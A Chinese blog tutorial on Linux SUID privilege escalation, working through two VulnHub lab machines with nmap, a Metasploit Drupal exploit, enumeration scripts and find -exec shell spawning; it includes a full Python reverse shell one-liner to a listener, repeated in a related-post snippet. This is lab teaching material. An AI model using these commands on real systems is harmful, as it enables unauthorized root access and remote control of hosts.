SUID提权

于 2025-07-08 22:00:12 发布
阅读量276 收藏 3
点赞数 3
CC 4.0 BY-SA版权
文章标签: suid提权 Linux权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73876403/article/details/149207579

原理

利用参考

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

suid提权

Linux系统中执行命令:查找(find)、awk、cp..时,用户权限不够的话,又想让搜索结果完整,赋予find一个suid sudo 然后find这个命令也有参数 参数可以执行出其他命令出来 这就造成提权漏洞
find ./ -exec “whoami”\;

1 案例一

web权限→系统权限
环境:DC: 1 ~ VulnHub

项目:LinEnum PEASS-ng

1.1 信息收集

nmap 192.168.2.0/24   #192.168.2.13

1.2 Web漏洞利用

msfconsole

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2 

set rhost 192.168.2.13

run

1.3 suid提权

upload /root/Desktop/tiquan/linux-exploit-suggester.sh /tmp/1.sh  #上传本地检测脚本到对方的tmp目录下
(upload /root/Desktop/tiquan/linpeas.sh /tmp/2.sh   #综合脚本) 

shell       #进入命令

cd /tmp

chmod +x 1.sh   #提升执行权限

./1.sh
/usr/bin/find . -exec '/bin/sh' \;   #开启一个命令终端 执行whoami
whoami    #显示root权限
cd /root
ls
cat thefinalflag.txt

2 案例二

普通用户→系统权限
环境:Toppo: 1 ~ VulnHub

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

2.1 信息收集

靶场ip 192.168.2.14
靶场设计http://192.168.2.14/admin/notes.txt 泄露密码ted/12345ted123

2.2.1 命令检测

SUID GUID
也可以通过命令进行判定suid和guid
find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

2.2.2 脚本检测

上传LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh # 发现可以用mawk python2.7

2.3 suid提权

利用python2.7能执行代码

nc-lvvp 9999   #kali开启监听9999端口  
通过生成一个python反弹shell提权
/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.26",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

starry_ke
关注
操作系统权限提升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2278
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
suid全解(超细)
技术超强的网络安全平台
12-10 8513
SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承限。SUID被定义为给予一个用户临时的(程序/文件)所有者的限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的限以及所有者的UID和GID。 查找suid文件 find / -perm -u=s -type f 2>/dev/null /表示从文件系统的顶部(根)开始并找到每个目录
SUID
snowlyzz的博客
08-14 1911
久经不衰的SUID
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
WEB渗透Linux篇-SUID
qq_59468567的博客
09-06 359
$touch xxx $/usr/bin/find xxx –exec whoami \; $/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen
Linux-01 SUID
weixin_45626840的博客
01-14 1147
如果有一个root用户设置了SUID限的可执行文件其后不能直接跟一个命令,或者说不能由用户传参去调用另一个可执行文件,但是其本身又调用了系统中的一个可执行文件,我们可以通过替换这个被调用的可执行文件,达到的目的。root用户设置了SUID的可执行文件,其他用户调用时也是以root限运行,如果这些可执行文件本身又可以调用其他可执行文件,或者可以更改系统的一些配置选项,就可以达到的目的。目录(用户定义的unit文件),不过通常测试人员获取的低限账号是不具备这两个目录的写入限的。
suidlinux
weixin_68652890的博客
04-15 1115
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
SUID(一)
02-19 559
大家好,我是东北码农。今天和大家分享linux下的SUID。 本文会按照下面主题进行分享: 什么是 什么是SUID 用户、进程凭证、文件限 下一篇文章会分享: CVE-2021-4034 漏洞讲解 CVE-2021-4034 利用实战 这个漏洞发现还不到3个月,应该还可以用奥。 0x1 什么是 最近研究了一下CVE-2021-4034,利用polkit在linux得漏洞。就是一个非root用户,不知道root密码,利用漏洞获得root限的过程。 看一下CVE-2
Linux SUID
柠檬木有枝
01-27 4905
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 限位文件0x02 常用方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
Linux:SUID
Elite的博客
03-05 3025
以find命令为例,讲解SUID原理
Linux SUID
最新发布
zmx999999的博客
03-23 529
GTFOBins 是一个专注于 Unix/Linux 系统(Privilege Escalation)和限绕过(Bypass) 的威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高限。
suid(特殊限位)
ZY95001的博客
07-28 1930
一、
网安学途—SUID教程
星虐
11-18 2042
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、find、bash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
LinuxSUID
CP1024的博客
04-04 4111
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
简谈SUID
2401_84466336的博客
05-28 1433
SUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
suidcp
01-20
### SUID方法 当文件设置了SUID位之后,任何运行该程序的用户都会暂时获得拥有者限。这可以被利用来进行操作。为了设置或移除SUID位,可使用`chmod`命令: ```bash chmod u+s filename # 设置SUID位 chmod u-s filename # 移除SUID位 ``` 一旦某个二进制文件具有了SUID限,攻击者可以通过执行此文件来获取更高的限[^2]。 #### 利用SUID进行的具体实例 假设存在一个带有SUID标志的应用程序允许用户修改其行为或参数,则可能成为潜在的安全风险点。例如,如果`/usr/bin/cp`这样的常用工具意外地获得了SUID属性,那么就可以创建恶意脚本并将其复制到受信任的位置从而实现非法访问控制升[^3]。 具体来说,下面是一个不安全的操作案例展示如何滥用这种机制完成过程: ```bash sudo sh -c 'cp $(which cp) .; chmod +s ./cp' ``` 这段代码的作用是从系统的路径中找到真正的`cp`命令位置,并将其副本放置于当前工作目录下;接着赋予新拷贝后的`cp`命令以SUID限。这意味着现在任何人都能以root的身份执行这个本地版本的`cp`指令。 ### CP技巧 对于CP(即copy命令),通常情况下它并不具备直接导致的能力。但是,在某些特殊场景里——比如上述到的情况或是其他形式误配置的情况下——它可以作为辅助手段参与到更复杂的攻击链路之中。特别是当管理员错误地授予了像`cp`这类基本实用程序额外特时,就有可能让普通用户绕过正常的安全限制而达到目的。 需要注意的是,以上描述仅用于教育和技术交流用途,请勿尝试在未经授许可的前下实施此类行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值